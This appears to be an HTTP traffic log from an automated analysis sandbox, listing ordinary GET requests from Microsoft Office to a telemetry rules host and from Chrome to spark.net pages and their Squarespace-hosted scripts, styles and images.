Source: global trafficHTTP traffic detected: GET /rules/rule704201v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule704200v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule704151v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule704150v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule226009v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /our-story/ HTTP/1.1Host: www.spark.netConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /static/versioned-site-css/65ddde819292aa47ed2c6d1d/8/5c5a519771c10ba3470d8101/65ddde819292aa47ed2c6d25/1567/site.css HTTP/1.1Host: static1.squarespace.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://www.spark.net/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /@sqs/polyfiller/1.6/modern.js HTTP/1.1Host: assets.squarespace.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.spark.netsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.spark.net/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /static/vta/5c5a519771c10ba3470d8101/versioned-assets/1727804539977-GUUAELH2KBGFYQUCPSYV/static.css HTTP/1.1Host: static1.squarespace.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://www.spark.net/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /content/v1/65ddde819292aa47ed2c6d1d/87b0a6e8-4e6f-4194-ae3e-51e8402c7cde/logo.png?format=1500w HTTP/1.1Host: images.squarespace-cdn.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.spark.net/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /content/v1/624b503b5d73881124e70a24/1649102938116-IM1UQW3EJ4W5NZFG3WTM/Stocksy_comp_1338592.jpg?format=1500w HTTP/1.1Host: images.squarespace-cdn.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.spark.net/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /content/v1/65ddde819292aa47ed2c6d1d/87b0a6e8-4e6f-4194-ae3e-51e8402c7cde/logo.png?format=1500w HTTP/1.1Host: images.squarespace-cdn.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /@sqs/polyfiller/1.6/modern.js HTTP/1.1Host: assets.squarespace.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /universal/scripts-compressed/extract-css-runtime-bee09188f1fd427a5f1a-min.en-US.js HTTP/1.1Host: assets.squarespace.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.spark.netsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.spark.net/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /content/v1/624b503b5d73881124e70a24/1649102938116-IM1UQW3EJ4W5NZFG3WTM/Stocksy_comp_1338592.jpg?format=1500w HTTP/1.1Host: images.squarespace-cdn.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /universal/scripts-compressed/extract-css-runtime-bee09188f1fd427a5f1a-min.en-US.js HTTP/1.1Host: assets.squarespace.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /content/v1/65ddde819292aa47ed2c6d1d/7e485c86-26dc-4157-8f73-a00e5d6ed440/our-story.jpg?format=1500w HTTP/1.1Host: images.squarespace-cdn.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.spark.net/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /content/v1/624b503b5d73881124e70a24/1649102938133-NCW97Y3D0XNSB9T4EAPG/image-asset.jpeg?format=1500w HTTP/1.1Host: images.squarespace-cdn.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.spark.net/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /static/vta/5c5a519771c10ba3470d8101/scripts/site-bundle.65e26242174e7f2d8845e29aa884ad31.js HTTP/1.1Host: static1.squarespace.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.spark.net/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /universal/scripts-compressed/extract-css-moment-js-vendor-6c569122bfa66a51a056-min.en-US.js HTTP/1.1Host: assets.squarespace.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.spark.netsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.spark.net/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /universal/scripts-compressed/cldr-resource-pack-e755ccfc180e7a2ab623-min.en-US.js HTTP/1.1Host: assets.squarespace.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.spark.netsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.spark.net/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /universal/scripts-compressed/common-vendors-stable-61293f01d648eef165fc-min.en-US.js HTTP/1.1Host: assets.squarespace.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.spark.netsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.spark.net/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /universal/scripts-compressed/common-vendors-bfa4951cbb922ca49214-min.en-US.js HTTP/1.1Host: assets.squarespace.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.spark.netsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.spark.net/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /universal/scripts-compressed/common-e4650bfe0701012bc38f-min.en-US.js HTTP/1.1Host: assets.squarespace.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.spark.netsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.spark.net/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /universal/scripts-compressed/performance-be9599e0923b14e6f074-min.en-US.js HTTP/1.1Host: assets.squarespace.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.spark.netsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.spark.net/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /universal/scripts-compressed/performance-be9599e0923b14e6f074-min.en-US.js HTTP/1.1Host: assets.squarespace.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /universal/scripts-compressed/cldr-resource-pack-e755ccfc180e7a2ab623-min.en-US.js HTTP/1.1Host: assets.squarespace.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /content/v1/65ddde819292aa47ed2c6d1d/7e485c86-26dc-4157-8f73-a00e5d6ed440/our-story.jpg?format=1500w HTTP/1.1Host: images.squarespace-cdn.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /universal/scripts-compressed/common-vendors-stable-61293f01d648eef165fc-min.en-US.js HTTP/1.1Host: assets.squarespace.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /content/v1/624b503b5d73881124e70a24/1649102938133-NCW97Y3D0XNSB9T4EAPG/image-asset.jpeg?format=1500w HTTP/1.1Host: images.squarespace-cdn.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /static/vta/5c5a519771c10ba3470d8101/scripts/site-bundle.65e26242174e7f2d8845e29aa884ad31.js HTTP/1.1Host: static1.squarespace.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /universal/scripts-compressed/common-vendors-bfa4951cbb922ca49214-min.en-US.js HTTP/1.1Host: assets.squarespace.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /universal/scripts-compressed/extract-css-moment-js-vendor-6c569122bfa66a51a056-min.en-US.js HTTP/1.1Host: assets.squarespace.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /universal/scripts-compressed/common-e4650bfe0701012bc38f-min.en-US.js HTTP/1.1Host: assets.squarespace.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /static/vta/5c5a519771c10ba3470d8101/scripts/floating-cart.11c2f1b3c1cb2ba0d418.js HTTP/1.1Host: static1.squarespace.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.spark.net/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /universal/styles-compressed/2356ee25bed07678b7ee-min.en-US.css HTTP/1.1Host: assets.squarespace.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://www.spark.net/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /universal/scripts-compressed/2775-b1c0136b925e8dc5943e-min.en-US.js HTTP/1.1Host: assets.squarespace.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.spark.net/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /universal/scripts-compressed/async-gdpr-cookie-banner-0ca3659314a26eea17bb-min.en-US.js HTTP/1.1Host: assets.squarespace.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.spark.net/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /static/vta/5c5a519771c10ba3470d8101/scripts/floating-cart.11c2f1b3c1cb2ba0d418.js HTTP/1.1Host: static1.squarespace.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /universal/scripts-compressed/2775-b1c0136b925e8dc5943e-min.en-US.js HTTP/1.1Host: assets.squarespace.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /api/census/RecordHit HTTP/1.1Host: www.spark.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: crumb=BbtMe1PElTyHNTBjN2Q5ZTlkYzgwZTZkNDUxZGQ4NzEyNmNmY2I2
Source: global trafficHTTP traffic detected: GET /universal/scripts-compressed/async-gdpr-cookie-banner-0ca3659314a26eea17bb-min.en-US.js HTTP/1.1Host: assets.squarespace.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /content/v1/65ddde819292aa47ed2c6d1d/de749afd-25b3-4000-88ee-3f3a2db2061b/favicon.ico?format=100w HTTP/1.1Host: images.squarespace-cdn.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.spark.net/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /content/v1/65ddde819292aa47ed2c6d1d/de749afd-25b3-4000-88ee-3f3a2db2061b/favicon.ico?format=100w HTTP/1.1Host: images.squarespace-cdn.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /our-portfolio/ HTTP/1.1Host: www.spark.netConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: crumb=BbtMe1PElTyHNTBjN2Q5ZTlkYzgwZTZkNDUxZGQ4NzEyNmNmY2I2
Source: global trafficHTTP traffic detected: GET /content/v1/65ddde819292aa47ed2c6d1d/03b0fd77-d50c-4741-84f9-65afe3436291/zoosk.png?format=750w HTTP/1.1Host: images.squarespace-cdn.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.spark.net/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /content/v1/65ddde819292aa47ed2c6d1d/137f96f5-56ba-4576-88ab-9b0999060379/EliteSingles_0.png?format=750w HTTP/1.1Host: images.squarespace-cdn.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.spark.net/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /content/v1/65ddde819292aa47ed2c6d1d/56d929e6-8419-4133-89bf-d861886af153/SilverSingles_1.png?format=750w HTTP/1.1Host: images.squarespace-cdn.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.spark.net/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
